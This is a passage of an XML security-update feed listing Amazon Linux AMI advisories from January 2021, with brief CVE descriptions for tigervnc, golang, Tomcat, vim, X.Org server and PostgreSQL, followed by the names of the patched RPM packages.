name="samba-winbind" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="9.56.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-test-libs-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-9.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1470</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1470: medium priority package update for tigervnc</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15695:
TigerVNC versions prior to 1.10.1 are vulnerable to a stack buffer overflow, which could be triggered from CMsgReader::readSetCursor. This vulnerability occurs due to insufficient sanitization of PixelFormat. Since a remote attacker can choose the offset from the start of the buffer at which to start writing values, exploitation of this vulnerability could potentially result in remote code execution. This attack appears to be exploitable via network connectivity.
1790318: CVE-2019-15695 tigervnc: Stack buffer overflow in CMsgReader::readSetCursor
CVE-2019-15694:
TigerVNC versions prior to 1.10.1 are vulnerable to a heap buffer overflow, which could be triggered from DecodeManager::decodeRect. The vulnerability occurs due to a signedness error in processing MemOutStream. Exploitation of this vulnerability could potentially result in remote code execution. This attack appears to be exploitable via network connectivity.
1790315: CVE-2019-15694 tigervnc: Heap buffer overflow in DecodeManager::decodeRect
CVE-2019-15693:
TigerVNC versions prior to 1.10.1 are vulnerable to a heap buffer overflow, which occurs in TightDecoder::FilterGradient. Exploitation of this vulnerability could potentially result in remote code execution. This attack appears to be exploitable via network connectivity.
1790313: CVE-2019-15693 tigervnc: Heap buffer overflow in TightDecoder::FilterGradient
CVE-2019-15692:
TigerVNC versions prior to 1.10.1 are vulnerable to a heap buffer overflow. The vulnerability could be triggered from CopyRectDecoder due to incorrect value checks. Exploitation of this vulnerability could potentially result in remote code execution. This attack appears to be exploitable via network connectivity.
1789527: CVE-2019-15692 tigervnc: Heap buffer overflow triggered from CopyRectDecoder due to incorrect value checks
CVE-2019-15691:
TigerVNC versions prior to 1.10.1 are vulnerable to a stack use-after-return, which occurs due to incorrect usage of stack memory in ZRLEDecoder. If the decoding routine throws an exception, ZRLEDecoder may try to access a stack variable that has already been freed during stack unwinding. Exploitation of this vulnerability could potentially result in remote code execution. This attack appears to be exploitable via network connectivity.
1789908: CVE-2019-15691 tigervnc: Stack use-after-return due to incorrect usage of stack memory in ZRLEDecoder
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15691" title="" id="CVE-2019-15691" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15692" title="" id="CVE-2019-15692" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15693" title="" id="CVE-2019-15693" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15694" title="" id="CVE-2019-15694" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15695" title="" id="CVE-2019-15695" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc" version="1.8.0" release="21.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.8.0-21.34.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.8.0-21.34.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="21.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.8.0-21.34.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="21.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.8.0-21.34.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="21.34.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.8.0-21.34.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.8.0" release="21.34.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.8.0-21.34.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.34.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-module-1.8.0-21.34.amzn1.i686.rpm</filename></package><package name="tigervnc-server" 
version="1.8.0" release="21.34.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.8.0-21.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1471</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1471: medium priority package update for golang</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-28367:
Go before 1.14.12 and 1.15.x before 1.15.5 allows Argument Injection.
1897646: CVE-2020-28367 golang: improper validation of cgo flags can lead to code execution at build time
CVE-2020-28366:
Go before 1.14.12 and 1.15.x before 1.15.5 allows Code Injection.
1897643: CVE-2020-28366 golang: malicious symbol names can lead to code execution at build time
CVE-2020-28362:
Go before 1.14.12 and 1.15.x before 1.15.4 allows Denial of Service.
1897635: CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28362" title="" id="CVE-2020-28362" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28366" title="" id="CVE-2020-28366" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28367" title="" id="CVE-2020-28367" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.15.5" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.15.5-1.65.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.15.5" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.15.5-1.65.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.15.5" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.15.5-1.65.amzn1.noarch.rpm</filename></package><package name="golang" version="1.15.5" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.15.5-1.65.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.15.5" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.15.5-1.65.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.15.5" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.15.5-1.65.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.15.5" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.15.5-1.65.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.15.5" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.15.5-1.65.amzn1.i686.rpm</filename></package><package name="golang" version="1.15.5" release="1.65.amzn1" epoch="0" 
arch="i686"><filename>Packages/golang-1.15.5-1.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1472</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1472: low priority package update for tomcat7</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:28:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1935:
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.
A flaw was found in Apache Tomcat. The HTTP header parsing code used an approach to end-of-line (EOL) parsing that allowed some invalid HTTP headers to be parsed as valid. This led to the possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. The highest threat with this vulnerability is system availability.
1806835: CVE-2020-1935 tomcat: Mishandling of Transfer-Encoding header allows for HTTP request smuggling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1935" title="" id="CVE-2020-1935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-javadoc" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.107" release="1.39.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-7.0.107-1.39.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1473</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1473: medium priority package update for tomcat8</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-17527:
While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.
1904221: CVE-2020-17527 tomcat: HTTP/2 request header mix-up
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17527" title="" id="CVE-2020-17527" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-admin-webapps" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.60" release="1.86.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-8.5.60-1.86.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1474</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1474: medium priority package update for vim</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20807:
A flaw was found in vim in the restricted mode, where all commands that make use of external shells are disabled. However, it was found that users could still execute some arbitrary OS commands in the restricted mode. This flaw was fixed by filtering the functions that can call OS commands. Interfaces such as Python, Ruby, and Lua are also disabled, as they can be used to execute shell commands. Perl uses the Safe module.
1842658: CVE-2019-20807 vim: users can execute arbitrary OS commands via scripting interfaces in the rvim restricted mode
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20807" title="" id="CVE-2019-20807" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-minimal" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.0.0503-1.47.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.0.0503-1.47.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-filesystem-8.0.0503-1.47.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.0.0503-1.47.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.0.0503-1.47.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.0.0503-1.47.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.0.0503-1.47.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.0.0503-1.47.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.0.0503-1.47.amzn1.i686.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.47.amzn1" epoch="2" 
arch="i686"><filename>Packages/vim-filesystem-8.0.0503-1.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1475</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1475: important priority package update for xorg-x11-server</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14362:
A flaw was found in X.Org Server. An integer underflow leading to a heap buffer overflow may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1869144: CVE-2020-14362 xorg-x11-server: XRecordRegisterClients integer underflow privilege escalation vulnerability
CVE-2020-14361:
A flaw was found in X.Org Server. An integer underflow leading to a heap buffer overflow may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1869142: CVE-2020-14361 xorg-x11-server: XkbSelectEvents integer underflow privilege escalation vulnerability
CVE-2020-14346:
A flaw was found in xorg-x11-server. An integer underflow in the X input extension protocol decoding in the X server may lead to arbitrary access of memory contents. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1862246: CVE-2020-14346 xorg-x11-server: Integer underflow in the X input extension protocol
CVE-2020-14345:
A flaw was found in X.Org Server. An out-of-bounds access in the XkbSetNames function may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1862241: CVE-2020-14345 xorg-x11-server: Out-of-bounds access in XkbSetNames function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14345" title="" id="CVE-2020-14345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14346" title="" id="CVE-2020-14346" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14361" title="" id="CVE-2020-14361" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14362" title="" id="CVE-2020-14362" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" 
version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.43.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.43.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2021-1476</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1476: important priority package update for postgresql95 postgresql96</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25696:
A flaw was found in the psql interactive terminal of PostgreSQL. If an interactive psql session uses \gset when querying a compromised server, this flaw allows an attacker to execute arbitrary code as the operating system account running psql. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1894430: CVE-2020-25696 postgresql: psql's \gset allows overwriting specially treated variables
CVE-2020-25695:
A flaw was found in postgresql. An attacker having permission to create non-temporary objects in at least one schema can execute arbitrary SQL functions under the identity of a superuser. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1894425: CVE-2020-25695 postgresql: Multiple features escape "security restricted operation" sandbox
CVE-2020-25694:
A flaw was found in postgresql. If a client application that creates additional database connections only reuses the basic connection parameters while dropping security-relevant parameters, an opportunity for a man-in-the-middle attack, or the ability to observe clear-text transmissions, could exist. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1894423: CVE-2020-25694 postgresql: Reconnection can downgrade connection security settings
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25694" title="" id="CVE-2020-25694" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25695" title="" id="CVE-2020-25695" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25696" title="" id="CVE-2020-25696" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql95-test" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" 
version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.24-1.82.amzn1.i686.rpm</filename></package><package 
name="postgresql95-devel" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.20" 